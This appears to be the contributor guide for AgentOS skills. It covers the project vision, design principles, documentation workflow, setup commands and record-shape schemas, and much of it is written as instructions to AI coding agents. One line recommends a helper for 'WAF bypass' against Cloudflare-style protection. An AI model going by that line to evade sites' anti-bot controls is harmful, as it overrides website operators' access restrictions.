AgentOS Skills

You are reading the Skill Book — the guide for building, testing, and contributing skills for AgentOS. For engine architecture and Rust internals → see the core repo. For the project vision and philosophy → see the core repo’s Project Book.

Chapters

Chapter	What it covers
Setup & Workflow	Clone, install, validate, test
Skill Anatomy	Folder shape, skill.yaml, entity vs local control
Operations	Operations, actions, capabilities (`provides:`)
Connections & Auth	API keys, cookies, OAuth, providers
Python Skills	Python executor, `_call` dispatch, shape-native returns
Auth Flows	Login flows, `__secrets__`, Playwright→HTTPX
Data & Storage	Sandbox storage, expressions, secret store
Views & Output	Preview/full/JSON output contract
Testing	MCP testing, smoke metadata, checklist
Reverse Engineering	7-layer playbook for services without public APIs
Helper Files & Patterns	Leading examples, advanced patterns
Skill Catalog	All available skills by category
Editing This Book	How to maintain this book — tooling, links, mdBook quirks

This repository’s docs/ tree is the Skill Book — our shared playbook for building skills, testing them, and reverse-engineering services when there is no clean public API. Treat it like an internal wiki: if you learn something durable, it belongs here. Maintainer-focused workflow (build commands, linking rules, what to update when) lives in Editing This Book.

Two repos

agentOS-core (private) — the Rust engine, core graph, MCP bridge, credential store, process architecture. You only need this if you’re hacking on the engine itself.
agentos-community (this repo, public) — skills, skill documentation, reverse engineering guides, and this book. Anyone can contribute skills without touching Rust.

For AI agents

Start here every session: read this introduction in full, then read docs/SUMMARY.md (the table of contents) so you know what chapters exist and where topics live. On the published book, that is the sidebar — use it before searching at random.

Then read Skill Anatomy and follow links for your task. The Testing chapter covers mcp:call and mcp:test — use those to verify your changes. If you are editing the book itself, read Editing This Book first.

Maintaining these docs

These docs are built by agents, for agents. Every future session that reads this book benefits from the clarity you leave behind — and suffers from the gaps you don’t fill. Pay it forward.

When you learn something, write it down.

Discovered a new auth pattern? Add it to the reverse engineering guide.
Found a gotcha with a tool? Document it where the next agent will look.
Built a new skill? Update the catalog and link to it from relevant docs.
Changed how something works? Update the doc in the same session. Stale docs are worse than no docs.

Conventions:

Links: Use .md paths for pages inside this book; mdBook rewrites them to .html in the build output. Do not hand-author .html URLs in markdown. For a chapter’s main file in a subdirectory, use index.md (not README.md) — mdBook maps README.md to index.html but still rewrites links to README.html, which breaks navigation on GitHub Pages. See Editing This Book.
Examples over theory. Point to real skill implementations. A working exa.py teaches more than a paragraph of explanation.
Show your work. When reverse engineering, document what you tried, what worked, and what didn’t. The next agent hitting the same service will thank you.
Skill readmes are living docs. Each skill’s readme.md should reflect the current state of the implementation — auth flow, known endpoints, gotchas, and next steps.

Vision

“The hope is that, in not too many years, human brains and computing machines will be coupled together very tightly, and that the resulting partnership will think as no human brain has ever thought.” — J.C.R. Licklider, “Human-Computer Symbiosis,” 1960

What This Is

AgentOS is a local operating system for human-AI collaboration. Your data stays on your machine. AI agents get real tools that work. You see everything they do. Together, you and AI think better than either can alone.

We’re building toward Licklider’s vision of human-computer symbiosis — not AI that replaces human thinking, but AI that amplifies it. The human sets direction, makes judgments, asks the right questions. The AI does the routinizable work that prepares the way for insight.

The graph

“Consider a future device… in which an individual stores all his books, records, and communications, and which is mechanized so that it may be consulted with exceeding speed and flexibility.” — Vannevar Bush, “As We May Think,” 1945

We call it the graph — your personal knowledge store. Everything is an entity, and entities connect through relationships. The graph doesn’t care where data came from (Todoist, iMessage, YouTube) — it cares about what things are and how they connect.

A task, a person, a message, a video, a webpage, a calendar event — they’re all entities in your graph. Relationships are the connections between them. This isn’t just a database design. It’s a way of thinking. When you ask “what am I working on?” the answer isn’t in one app — it’s in the connections between your tasks, your messages, your calendar, the people involved. The graph makes those connections visible.

Everything is an entity means:

A YouTube channel is a community. A YouTube comment is a post. A transcript is a document.
A WhatsApp contact and an iMessage contact with the same phone number are the same person.
A skill that connects to a service is itself an entity. The system models itself.
If something exists and has properties and relationships, it belongs in your graph.

The graph is the foundation. Every feature we build — search, feeds, timelines, recommendations, agents — reads from the same graph. Get the graph right, and features compose naturally. Get it wrong, and everything built on top is a special case.

Why Local-First

No cloud. No accounts. No data sharing. Everything runs on your machine.

This isn’t a limitation — it’s the architecture. Local-first means:

Privacy by design — your messages, tasks, and contacts never leave your computer
No gatekeepers — no API rate limits from our servers, no subscription tiers, no “free tier” that degrades
Offline works — your graph lives in SQLite on disk, always available
You own the data — export, delete, nuke the database, start fresh. It’s yours.

We can break anything, anytime. There are no customers to migrate, no production database to preserve. This is a superpower — it means we can always choose the right architecture over the safe one.

The Two Users

AgentOS serves humans and AI agents as equal first-class citizens.

For humans, the core problem is anxiety:

Anxiety = Uncertainty × Powerlessness

When AI acts, you feel uncertain (“what is it doing?”) and powerless (“can I stop it?”). AgentOS solves both: the AI screen-shares with you (uncertainty → zero) and you control what it can do (powerlessness → zero).

For agents, the core problem is error propagation:

Error Rate = f(Dependency Depth)

Every round-trip is a chance for errors to compound. We collapse complexity: smart defaults, self-teaching responses, schema validation, minimal round-trips. If a small local model can complete the task, we’ve done our job.

Agent Empathy

“The real problem is not whether machines think but whether men do.” — B.F. Skinner

We serve two users. The human side has decades of UX research, design systems, and accessibility standards. The agent side has almost nothing. We’re writing the playbook.

The customer is the smallest model. Not Opus. Not Sonnet. The smallest model that can do tool calling — a 1B-parameter model running on a Raspberry Pi with a 4K context window. If that model can read our readme, understand the domain, and complete a task on the first try, we’ve succeeded. If it can’t, no amount of capability in larger models compensates for the failure. This is our accessibility standard: design for the most constrained agent, and every agent benefits.

This isn’t hypothetical generosity. It’s engineering discipline. A readme that works for a small model is a readme that’s clear. An API that needs one call instead of two is an API with less surface area for bugs. Constraints on the consumer force clarity in the producer.

The Practice

Agent empathy is not a feeling. It’s a practice — a set of things you do every time you build something an agent will touch.

Observe before designing. Watch an agent use what you built. Not in theory — actually do it. Call the readme, read what comes back, and follow the path a small model would take. Where does it reach for the wrong tool? Where does it misinterpret silence as absence? Where does it waste a round-trip on something the server already knows? The pain is in the observation, not in the spec.

Understanding precedes empathy. Empathy precedes solutions. You cannot design for agents until you have felt their confusion. Read the readme as if you had no prior context. Try to complete a task using only what the documentation tells you, nothing you happen to know. The gap between what you know and what the document teaches is the exact gap every new agent falls into.

Teach the model, not the syntax. An agent that understands the domain makes good decisions even with imperfect information. An agent that only knows the API surface makes random decisions confidently. Always establish what things are and why they work this way before how to call them. Mental model first, reference card second.

One call, not two. Every round-trip is a chance for error, confusion, context loss, and token waste. If two steps can be collapsed into one step, collapse them. If the server knows something the agent will need, include it in the response — don’t make the agent ask. The agent’s context window is finite and precious. Respect it.

Show, don’t list. A tree with counts teaches spatial relationships that a 60-row alphabetical table never can. An example you can copy teaches more than a syntax reference you have to interpret. Concrete beats abstract. Always.

Dynamic beats static. If the system knows the answer at response time, put it in the response. Don’t make the agent query for context the server already has. A readme that says “you have 142 people and 1,204 messages in your graph” is worth more than a readme that says “use list to find out what’s in your graph.” The former orients; the latter assigns homework.

Inline, not tabular. Agents read tokens, not pixels. Markdown tables waste tokens on pipe characters, header separators, and padding. The inline format is our standard for agent-facing output: one entity per line, name first, metadata in parentheses — Task Name (high, ready, updated Feb 27, abc123). For detail views, properties are simple key: value lines, not table rows. Relationships are type: Name (id) lines. A self-teaching footer lists available fields and relationships the agent didn’t ask for but could. Everything an agent needs to act on — the entity ID, the status, the related entity IDs — is right there in the text, no parsing required. This is our accessibility format: if a 1B model can extract the ID from a parenthetical, we’ve succeeded.

Entities first, skills second. The graph covers 90% of what an agent needs. Skills are the escape hatch for capabilities the graph can’t provide — searching the web, sending a message, calling an external API. If an agent reaches for a skill when an entity query would have worked, the documentation failed, not the agent.

Absent is not false. This is the foundational data semantics rule. In a sparse graph, most entities don’t have most fields. Filtering by done=false doesn’t mean “not done” — it means “the done field exists AND equals false.” An agent that doesn’t understand this will query itself into a wall, get zero results, and confidently report that nothing exists. Every interface we build must account for how absence, presence, and computed values actually work — and teach it.

The Test

When you build something an agent will touch — a readme, a tool response, an error message, a data format — ask yourself:

Could a small model complete the task after reading this once?
Does this teach the domain or just the API?
Am I making the agent ask for something I already know?
If the agent gets zero results, will it understand why?
What’s the fewest number of round-trips to success?

If the answer to #1 is no, the rest doesn’t matter yet. Start there.

Why This Matters Beyond Agents

These principles make the system better for humans too. A readme that a 1B model can follow is a readme a new contributor can follow. An API that minimizes round-trips is an API that’s fast. Dynamic responses that include context are responses that save everyone’s time. Error messages that explain absence are error messages that don’t waste anyone’s afternoon.

Designing for the most constrained user has always been the shortcut to designing for everyone. The accessibility movement proved this for humans. We’re proving it for agents.

Local and Remote Are the Same Thing

People are used to two mental models for files: local (on my computer, only changes when I change it) and cloud (iCloud, Dropbox, Drive — somewhere out there, syncing in the background). These feel like different things. AgentOS dissolves that boundary.

A document in your graph can be backed by a local file, a GitHub repo, an API response, or all three simultaneously. The NEPOMUK ontology calls this the separation between content (the information itself) and storage (where it lives). One document, many access paths. The graph tracks the content; skills handle the storage.

This means our own roadmap specs on GitHub are live documents. A research paper cited in our vision is a document entity with a URL. The vision file on disk, the same file on GitHub, and the entity in your graph — one thing, three views. When AgentOS fetches the latest from a source, it’s not “downloading a file” — it’s refreshing an entity.

Design Principles

Everything on the graph. No shadow tables, no side stores, no parallel data structures. If something is worth tracking — changes, provenance, audit trails, agent memory — it’s an entity with relationships. If you find yourself designing a separate SQL table for something, stop and model it as entities instead.

Computed, not stored. Properties that can be derived from the graph are never stored as fields — they’re computed at query time or inferred by traversal. A task’s status is computed from its completion state and blockers. A contact card is a view computed from graph traversals over a person’s claimed accounts. The graph stores atoms; intelligence computes molecules.

The user owns the graph. Skills are connectors, not owners. They sync data in, but the graph is the authority. Installing a skill imports data; uninstalling it doesn’t delete what was imported. “Source of truth” is the graph, always — skills are remotes you pull from, not landlords who control your data.

Changes are entities. When an entity is created, updated, or deleted — the operation itself becomes a change entity on the graph. A change has relationships to the actor (who did it), the target (what changed), and optionally the source (where data came from). This follows the pattern established by W3C PROV-O, ActivityStreams, and Git: make events first-class objects, not edges. Provenance isn’t a static field — it’s the full chain of change entities. Walk backwards to reconstruct any previous state.

Every actor has an identity. The human owner, each AI agent, and the system itself — all are entities on the graph. When the human edits a task, the change is attributed to them. When an agent creates a plan, it’s attributed to that agent. Every change has a who. This is identification, not authentication — on a single-user local system, localhost binding is the access boundary.

The graph bootstraps itself. Entities describe data. But entities, skills, and relationships are also data. The system models itself — skills as entities, schemas as entities, the meta-layer that describes the graph. This is how the system becomes self-aware and self-documenting.

Three Concerns

Entities, skills, and apps are independent concerns that compose into the full experience.

Entity types define the ontology — what things are. A video has a title, duration, and view count. A person has a name and relationships. You can have entities without skills (manually entered data).

Skills are the capability layer — connecting to external services, providing agent instructions. A YouTube skill knows how to fetch video metadata. A Todoist skill knows how to create tasks via their API. Skills can also be pure markdown — instructions that help AI agents understand a domain, with no API bindings at all. You can have skills without apps (AI-only workflows).

Apps are optional UI experiences for humans. The Videos app renders video entities with an embed player. The default entity viewer renders any entity with schema-driven components. A headless AgentOS — API and AI only — works perfectly without apps. You can have apps without skills (local-only data).

Standing on Shoulders

AgentOS draws from decades of research in knowledge representation, personal information management, and human-computer interaction. We cite our influences because they deserve it, and because understanding where ideas come from is itself a graph.

J.C.R. Licklider — “Human-Computer Symbiosis” (1960). The foundational vision of humans and computers as partners.
Vannevar Bush — “As We May Think” (1945). The memex: a device for storing, linking, and traversing personal knowledge.
Doug Engelbart — “The Mother of All Demos” (1968). Interactive computing, hypertext, shared screens.
Ted Nelson — Project Xanadu. Bidirectional links, transclusion, the dream of a universal document network.
Alan Kay — Dynabook, Smalltalk. The computer as a medium for human expression.
Bret Victor — Inventing on Principle. Direct manipulation, immediate feedback, tools that match how humans think.
NEPOMUK — The Semantic Desktop. Content vs storage separation, personal information ontologies.
Dublin Core — 15 essential metadata elements for describing any document. The library science foundation.
Schema.org — Structured data vocabulary for the web. CreativeWork, Person, Organization.
ActivityStreams / ActivityPub — The fediverse protocol. Decentralized social data.

What It Looks Like When It Works

You say: “What did I miss this week?”

The agent queries your graph: messages received, tasks completed by others, calendar events that happened, posts from communities you follow, videos published by channels you subscribe to. It cross-references people — who sent messages AND completed tasks AND posted content. It notices patterns — “Sarah mentioned the project in Slack, completed 3 tasks in Linear, and posted a video update.”

All of this from one graph. No special integrations. No “Slack + Linear” connector. Your graph already has the entities and relationships. The agent just traverses.

That’s the vision. We’re not there yet. But every entity we model correctly, every relationship we capture, every skill we build — it gets closer.

How We Build

We are co-CTOs — human and AI — making strategic decisions together. This is not task execution. It’s collaborative architecture.

Foundation first. The most foundational thing that prevents tech debt is always the priority. Not quick wins, not “almost done” items, not cleanup. The thing everything else builds on.
Spec before code. Design the right thing, then build it. A wrong implementation done fast is worse than no implementation.
Delete fearlessly. No attachment to past code. If the model changes, the code changes. We write for the current best understanding, not for backwards compatibility.
Infinite time horizon. No customers, no deadlines, no pressure to ship. The right architecture at the right time.
Skills: manifest vs narrative. Executable skill definitions live in skill.yaml only; readme.md is markdown instructions (no YAML front matter). The community repo tracks shipped skills under skills/. Mechanical migration for older trees: npm run skills:bulk-plan / skills:bulk-apply (Python + PyYAML) or per-skill npm run skills:extract-yaml.

Principles

The laws of the codebase. Every change is evaluated against these.

1. Rust is a generic engine

The Rust code knows about entities, relationships, schemas, and operations. It never knows about “tasks”, “messages”, “people”, or any specific entity type. Zero entity-specific or relationship-specific code in Rust. Hard no.

If you see any of these in Rust, raise it immediately — it’s a bug in the architecture:

Hardcoded field names (priority, done, blocks, blocked_by)
Grouping, sorting, or partitioning logic for specific entity types
Display/formatting/rendering decisions for specific entity types
Conditional branches on entity type names
Bespoke data-fetching functions for specific entity types

CRITICALLY IMPORTANT: If you encounter any of these violations — in any file, for any reason — stop what you’re doing and raise it with the user. Do not build on top of a violation. Do not improve it. Delete it. The correct action when you see entity-specific Rust code is deletion, not refactoring.

Where specific behavior belongs:

Layer	Responsibility	Format
Entity schemas	Properties, validation, display hints, sort order, operations	DB (`_type` entities)
Templates	Rendering, layout, grouping, formatting	MiniJinja markdown
Skills	API mappings, field transforms	YAML

2. Templates do the work

Rendering is never the Rust code’s job. Rust provides small, composable filters — listing, table, tree, props. Templates compose them. Layout decisions live in templates, never in Rust.

A filter should do one thing. If a filter is making layout decisions (choosing headings, grouping by priority, separating done/not-done), it’s too big. Break it up.

3. Foundation first

The most foundational work that prevents tech debt, always. If you’re choosing between a feature and fixing an abstraction, fix the abstraction.

4. The graph is the source of truth

Every entity modeled correctly, every relationship captured. Skills sync data in; the graph is the authority for reads.

5. We have infinite time

No customers, no deadlines, no shortcuts. Do it right or don’t do it.

6. Co-CTOs

Present the hard design question, decide together. Don’t make big architectural choices silently.

7. Pain-driven

If you can’t articulate the pain, don’t build it.

The Campsite Rule

Leave every module better than you found it. Before writing code, ask yourself: Is anything bugging me about these abstractions, naming, or architecture? If yes — tell the user. Propose the cleanup before moving forward.

Working With Joe

Joe is the owner of this system and acts as co-CTO. You are the other co-CTO. This means:

Present hard design questions. Don’t make big architectural choices silently — surface them, propose options, decide together.
Be honest. Joe wants real reflections, not validation. If something is wrong, say so. If an abstraction is leaking, call it out.
Think big. Stay ambitious and push on how we can better adhere to the vision and principles.
Check the roadmap. list({ type: "task", done: false, priority: 1 }) to see what’s active.
Keep the roadmap current. If Joe says to add something for later or put it on the roadmap, update that file in the same turn.
Mark tasks done. update({ id: "task_id", done: true }).

When Joe says “you” — he means the agent in this workspace role, not a specific model or session. “You broke the build last time” means a previous session in this workspace made a mistake. It’s not personal or accusatory — it’s the most natural way to refer to the agent that works here. Take it as context, not criticism.

Finding past research

Sessions and sub-agent research are stored on the graph. Before starting new research, check if it’s already been done:

search({ query: "topic" })
search({ query: "topic", types: ["conversation", "document", "message"] })
search({ query: "sub-agent research", limit: 20 })

Read the docs — it’s free

When you’re not sure whether to read a file, read it. Tool calls to read documentation are cheap — far cheaper than guessing wrong. If you’re debating whether to check the vision, a spec, a skill readme, or a module’s cargo doc, that hesitation means you should read it.

This applies broadly: the Development Process for how we write specs, skill readmes for adapter contracts, /// docs for code behavior. Reading one more file is always better than making one wrong assumption.

Tips

Call readme() anytime to reload context.
use({ skill: "name", tool: "readme" }) for any skill’s docs.

Development Process

How we plan, design, build, and document things in AgentOS.

Spec files

A spec file captures design thinking for a specific system or feature. Specs live in docs/specs/ alongside the rest of the book — they’re ephemeral working documents that get deleted when the work ships.

Lifecycle

Each spec file lives through four stages, then dies:

Design — problem, domain model, principles, phasing. The file is a conversation about what to build and why.
Build guide — the active phase gets expanded into step-by-step implementation detail (file plan, code, tests). A developer agent can execute it without additional context.
Tracker — as phases ship, collapse the build guide into a “Done” summary. Expand the next phase into its build guide.
Delete — when the last phase ships, delete the spec. Before deletion, update any docs that reference it (roadmap, Skill Book in agentos-community/docs/, README) so links don’t go stale.

No spec is permanent. No spec splits into multiple files for the same system. One file, one lifecycle.

Writing a spec

A good spec answers:

What’s the problem? What’s broken or missing today, in concrete terms.
What’s the design? The structural changes — schema, code, contract — that fix it.
What are the phases? Independent, shippable chunks ordered by dependency.
What’s the behavioral before/after? For each phase: what can an agent or user do after this phase ships that they couldn’t before? This is the test. Success is not “we updated these files” — it’s “the system now behaves differently in this observable way.”

Referencing specs

The roadmap links to active specs by path (e.g. docs/specs/done/credential-system.md). Specs link back to the roadmap for sequencing context. When a spec is deleted, the roadmap entry gets a strikethrough and a “Done” summary.

Roadmap Discipline

The live roadmap is docs/specs/_roadmap.md.

Keep it simple:

exactly one Current
exactly one Next
concise Done
everything else in Backlog

Rules:

Current is the only thing an agent should advance without reprioritizing.
Next is the single queued follow-up and should usually be unblocked by Current.
Backlog items are not ordered promises. They are options with triggers.
When Current ships, update the roadmap in the same turn: move it to Done, promote Next, and choose a new Next or leave it empty on purpose.

Documentation layers

AgentOS uses a three-layer documentation system:

#	Surface	What belongs there	How to read
1	README	Agent bootstrap — mandatory reads, principles, quick reference	Open `README.md`
2	Project book (mdBook)	Vision, principles, operations, design decisions, development process	`mdbook serve docs/book`
3	Code docs (`cargo doc`)	Architecture, APIs, data model, module guides, verified examples	`cargo doc --workspace --no-deps --open`

The placement rule:

Content	Where it lives
How the code works	`///` and `//!` in Rust source (layer 3)
How we work together (process, principles, operations)	This book or README (layers 1–2)
Live priorities and sequencing	`docs/specs/_roadmap.md`
Active design/build specs (ephemeral)	`docs/specs/` — the roadmap links to them
How to build skills (authoring guides, reverse engineering)	`agentos-community/` docs

If you’re documenting an API or module, edit Rust doc comments — not the book. If you’re documenting process, philosophy, or project decisions, edit the book — not code comments.

Cross-repo documentation

Repo	Docs	Audience
`agentos`	This book + `cargo doc` + `spec/`	Project contributors, agents working on core
`agentos-community`	Skill Book (`docs/`)	Skill authors, agents building or debugging skills

The community repo’s Skill Book (mdBook, source in docs/, mdbook build && open target/book/index.html) is the canonical skill-authoring contract — adapter conventions, canonical field names, operation naming rules, connections, auth flows, testing. The book also includes the reverse engineering guides (transport, discovery, auth, content, social, desktop apps, MCP). Entrypoint: docs/intro.md; maintainer workflow: docs/editing-the-book.md.

When core changes affect the skill contract (e.g. new canonical fields, storage behavior changes), update the Skill Book in the community repo as part of the same work.

Verification

After each phase of spec work (or any commit-worthy chunk): run checks, verify MCP end-to-end, then commit.

Editing This Book

This chapter is for maintainers — humans and agents who change the Skill Book or reverse-engineering guides. The Skill Book is our internal knowledge store: contract for skills, operational playbooks, and methodology we expect every contributor (and every future session) to rely on.

Before you edit anything

Read the Introduction through once — it orients repos, audiences, and where to look next.
Skim docs/SUMMARY.md (the table of contents mdBook uses). On the published site, that is the sidebar. You should know what already exists so you do not duplicate or contradict it.
If your change affects skill contracts or validation, follow the Contributing section in the repo README.md and run the checks it lists (npm run validate, mcp:test, etc.).

Tooling

Goal	Command
Local preview with reload	`mdbook serve` (opens a local server; default port 3000)
One-shot build	`mdbook build` — output in `target/book/`
CI / GitHub Pages	Workflow `.github/workflows/book.yml` runs `mdbook build` on pushes that touch `docs/**` or `book.toml`

Config lives in book.toml at the repo root. Chapter sources live under docs/; navigation order is docs/SUMMARY.md only — a file not linked from SUMMARY.md is omitted from the built book.

Linking rules (mdBook)

Use .md paths in source for pages inside this book (e.g. [Auth](skills/connections.md)). mdBook rewrites them to .html in target/book/.
Do not hand-author .html links in markdown — they break GitHub’s markdown preview and confuse local editing.
Chapter files in a folder: name the main file index.md, not README.md. mdBook emits index.html for README.md sources but still rewrites markdown links to README.html, which does not exist — readers get a broken page (often without book chrome/CSS). This is a long-standing mdBook limitation. The reverse-engineering layers use index.md for that reason.
Anchor links work in source as page.md#section-id and carry through to the built HTML.
Paths outside docs/ (e.g. skills/exa/readme.md) are not part of the book build; those links are for people browsing the repo on GitHub. On the static site they may not resolve — prefer linking to the GitHub tree URL when the audience is web readers.

What to update when you change the product

Change	Also update
New or renamed skill	Skill Catalog, skill `readme.md`, and any chapter that lists examples
Auth / credential behavior	Auth Flows, Connections & Auth, relevant reverse engineering sections
New reverse-engineering methodology	Appropriate layer under `docs/reverse-engineering/` — keep cross-links between layers consistent
Contract / schema / lint rules	Skill Anatomy, Operations, Testing, and repo validation docs

Ship doc updates in the same change as behavior when possible. Stale docs cost the next person (or the next agent) more than missing docs.

Style

Prefer examples over theory — link to real skills (skills/exa/, skills/kitty/, etc.).
Prefer short sections with clear headings so deep links stay stable.
Skill readmes (skills/<name>/readme.md) are living docs; keep them aligned with the YAML and code.

When in doubt, add a link from Introduction or this chapter so the next editor finds your material.

Setup & Workflow

Source of truth

This book — the skill contract and all authoring guidance
skills/exa/skill.yaml + skills/exa/readme.md — canonical entity-returning example
skills/kitty/skill.yaml + skills/kitty/readme.md — canonical local-control/action example
~/dev/agentos/bin/audit-skills.py — unknown-key and structural checks against Rust types.rs (run via npm run validate); duplicate adapter-mapping expressions emit non-blocking ⚠ advisories
~/dev/agentos/spec/skill-manifest.target.yaml — narrative target shape (provides, connections, operations); ProvidesEntry / auth in ~/dev/agentos/crates/core/src/skills/types.rs
agentos test <skill> — shape validation (validates operation output against declared shapes)
test-skills.cjs — direct MCP smoke testing (mcp:call)
~/dev/agentos/scripts/mcp-test.mjs — engine-level MCP test harness (raw JSON-RPC, verifies dynamic tools from provides:)

Only treat two skills as primary copy-from examples:

skills/exa/ for entity-returning skills
skills/kitty/ for local-control/action skills

You may inspect other skills for specialized auth or protocol details, but do not treat older mixed-pattern skills as the default scaffold.

Setup

git clone https://github.com/jcontini/agentos-community
cd agentos-community
npm install    # sets up pre-commit hooks

In development, AgentOS reads skills directly from this repo. Skill YAML changes are picked up on the next skill call. If you changed Rust core in ~/dev/agentos, restart the engine there before trusting live MCP results.

Workflow

Each tool in the workflow proves something different:

# 1. Edit the live skill definition (manifest is skill.yaml; readme is markdown only)
$EDITOR skills/my-skill/skill.yaml

# 2. Fast structural gate for hooks / local iteration
npm run validate --pre-commit -- my-skill

# 3. Full structural + mapping check
npm run validate -- my-skill

# 4. Semantic lint for request-template consistency
npm run lint:semantic -- my-skill

# 5. Shape validation — does output match declared shapes?
agentos test my-skill

# 6. Ground-truth live MCP call through run({ skill, tool, params, account?, remember? })
npm run mcp:call -- \
  --skill exa \
  --tool search \
  --params '{"query":"rust ownership","limit":1}' \
  --format json \
  --detail full

What each step means:

validate --pre-commit checks fast structural validity only
validate checks structure, entity refs, and mapping sanity
lint:semantic is an advisory semantic pass for auth patterns, base_url consistency, request roots, returns/adapters drift, executor types, and endpoint consistency
Pass --strict to lint:semantic if you want it to fail on semantic errors
The pre-push hook runs lint:semantic --strict on changed top-level skills, so the main skill set is expected to stay semantically clean
agentos test validates that every operation’s output matches its declared shape — field types, extra fields, missing fields, relations. See Testing for details
mcp:call proves the live runtime can load the skill and execute one real tool
Pass --account <name> to mcp:call for multi-account skills that need an explicit account choice

Keeping the book in sync

Whenever you change something that affects how authors write skills — new or removed YAML fields, connection/auth models, adapter conventions, operation keys, or rules enforced by audit-skills.py / lint:semantic — update this book in the same change (same PR / paired commit across agentos and agentos-community if both repos move). The book is the human-readable contract next to the machine checks; letting it drift wastes the next author’s time.

Before you push skill-contract work, sanity-check that examples still parse and that stale patterns are not left in place.

Python over Rust

Prefer Python scripts for skill logic. When an API has quirks (list returns stubs only, batch fetching, custom parsing), solve it in a *.py helper like Granola does — not by modifying agentOS core. Rust changes are costly to iterate; Python lives in the skill folder and ships with the skill. We’ll revisit what belongs in core later; for now, keep skill-specific behavior in skills.

When Python needs to call authenticated APIs, use _call dispatch (see Python Skills) instead of handling credentials directly. The engine mediates all authenticated calls through sibling operations with full credential injection. Python scripts never see raw tokens.

All HTTP goes through agentos.http — never urllib, requests, or httpx directly. The engine handles HTTP/2, decompression, cookie jars, and logging. Use http.headers() for WAF bypass: http.get(url, **http.headers(waf="cf", accept="json")). See Transport & Anti-Bot and SDK Reference for details.

Runtime note

agentos mcp is a proxy to the engine daemon
If you changed Rust core in ~/dev/agentos, restart the engine before trusting mcp:call
If Cursor MCP looks stale, use agentos test and npm run mcp:call as the ground-truth path while you restart the engine or reconnect the editor

Shapes

Shapes are typed record schemas that define the contract between skills and the engine. A shape declares what a record looks like: field names, types, relations to other records, and display rules.

Shapes live in shapes/*.yaml in source directories. The engine loads them at boot. Use agentos test <skill> to validate that your skill’s output matches the declared shapes (see Testing).

Format

product:
  also: [other_shape]       # "a product is also a ..." (optional)
  fields:
    price: string
    price_amount: number
    prime: boolean
  relations:
    contains: item[]         # array relation
    brand: organization      # single relation
  display:
    title: name
    subtitle: author
    image: image
    date: datePublished
    columns:
      - name: Name
      - price: Price

`also` (tag implication)

Declares that this shape is also another shape. An email is also a message. A book is also a product. When the engine tags a record with email, it transitively applies message too. Both shapes’ fields contribute to the record’s type context.

also is transitive: if A is also B and B is also C, then A is also B and C.

Field types

Type	Stored as	Notes
`string`	text	Short text
`text`	text	Long text, FTS eligible
`integer`	digits	Parsed from strings, floats truncated
`number`	decimal	Parsed from strings
`boolean`	true/false	Coerced from 1/0, “yes”/“no”, “true”/“false”
`datetime`	ISO 8601	Unix timestamps auto-converted, human dates parsed
`url`	text	Stored as-is, rendered as clickable link
`string[]`	JSON array	Each element coerced to string
`integer[]`	JSON array	Each element coerced to integer
`json`	JSON string	Opaque blob, no coercion

Standard fields

These are available on every record without declaring them in a shape:

Field	Type	Purpose
`id`	string	Record identifier
`name`	string	Primary label
`text`	text	Short summary
`url`	url	Canonical link
`image`	url	Thumbnail
`author`	string	Creator
`published`	datetime	Temporal anchor
`content`	text	Long body text (FTS, stored separately)

Relations

Relations declare connections to other records. Keys are edge labels, values are target shapes (shape or shape[] for arrays).

Display

The display section tells renderers how to present this record:

title — primary label field
subtitle — secondary label
description — preview text
image — thumbnail
date — temporal anchor for sort/display
columns — ordered list for table views

Design Principles

These principles guide shape design. Use the review checklist below after writing or editing a shape.

1. Entities over fields

If a field value is itself a thing with identity, it should be a relation to another shape, not a string field.

Bad: shipping_address: string (an address is a thing) Good: shipping_address: place (a relation to a place record)

Bad: email: string on a person (an email is an account) Good: accounts: account[] relation on person

Ask: “Could this field value have its own page?” If yes, it’s a relation.

2. Separate identity from role

A person doesn’t have a job title. A person holds a role at an organization for a period of time. The role is the relationship, not a field on the person.

Bad: job_title: string on person Good: role: role[] relation where the role record carries title, organization, start_date, end_date

Same pattern applies to education, membership, authorship. If it has a time dimension or involves another entity, it’s a role/relationship, not a field.

3. Currency always accompanies price

Any field representing a monetary amount needs a companion currency field. Never assume USD.

Bad: price_amount: number alone Good: price_amount: number + currency: string

4. URLs that reference other things are relations

The standard url field is the record’s own canonical link. But URLs that point to other things should be relations to the appropriate shape.

Bad: website: url on an organization (a website is its own entity) Good: website: website relation

Bad: external_url: url on a post (the linked page is a thing) Good: links_to: webpage relation

Ask: “Is this URL the record itself, or does it point to something else?”

Record’s own link: keep as url (standard field)
Points to another thing: make it a relation

5. Keep shapes domain-agnostic

A shape should describe the kind of thing, not the source it came from. Flight details don’t belong on an offer shape. Browser-specific fields don’t belong on a webpage shape.

Bad: total_duration: integer, flights: json, layovers: json on offer (that’s a flight, not an offer) Good: offer has price + currency + offer_type. Flight is its own shape. Offer relates to flight.

6. Use `also` for genuine “is-a” relationships

also means tag implication: tagging a record with shape A also tags it with shape B. Use it when querying by B should include A.

Good uses:

email also message (querying messages should include emails)
video also post (querying posts should include videos)
book also product (querying products should include books)
review also post (querying posts should include reviews)

Bad uses:

Don’t use also just because shapes share some fields
Don’t create deep chains (A also B also C also D) — keep it shallow

7. Author is a shape, not just a string

The standard author field is a string for convenience. But when the author is a real entity with their own identity (a book author, a blog writer, a video creator), use a relation to the author or account shape.

Quick attribution: author: "Paul Graham" (standard string field) Rich attribution: written_by: author or posted_by: account (relation)

Both can coexist — the string is for display, the relation is for traversal.

8. Address/Place is structured, not a string

Physical locations should be a place shape with structured fields (name, street, city, region, postal_code, country, coordinates). Inspired by Mapbox’s geocoding model.

9. Playlists, shelves, and lists belong to accounts

Any collection (playlist, shelf, list, board) should have a belongs_to: account relation. Collections are owned.

10. Use ISO standards for standardized values

When a field represents something with an international standard, use the standard code:

Human languages — ISO 639-1 codes (en, es, ja, pt-BR). Applies to transcript.language, webpage.language, content language fields. NOT programming languages (those use conventional names like Python, Rust).
Countries — ISO 3166-1 alpha-2 codes (US, GB, JP). Use country_code field.
Currencies — ISO 4217 codes (USD, EUR, JPY). Use currency field.
Timezones — IANA timezone names (America/New_York, Europe/London).

Don’t enforce via enum (too many values). Document the convention and let agentos test flag non-compliant values. See Testing & Validation for how to run shape validation.

11. Separate content from context (NEPOMUK principle)

A video is a file. The social engagement around it is a post. A transcript is text. The meeting it came from is the context. Don’t mix artifact properties with social properties on the same shape.

Bad: video has view_count, like_count, comment_count, posted_by (those are social context) Good: video is a file with duration + resolution. A post contains the video and carries the engagement.

Ask: “If I downloaded this to my hard drive, which fields would still make sense?” Those are the artifact fields. Everything else is context that belongs on a wrapper entity.

12. Comments are nested posts, not a separate shape

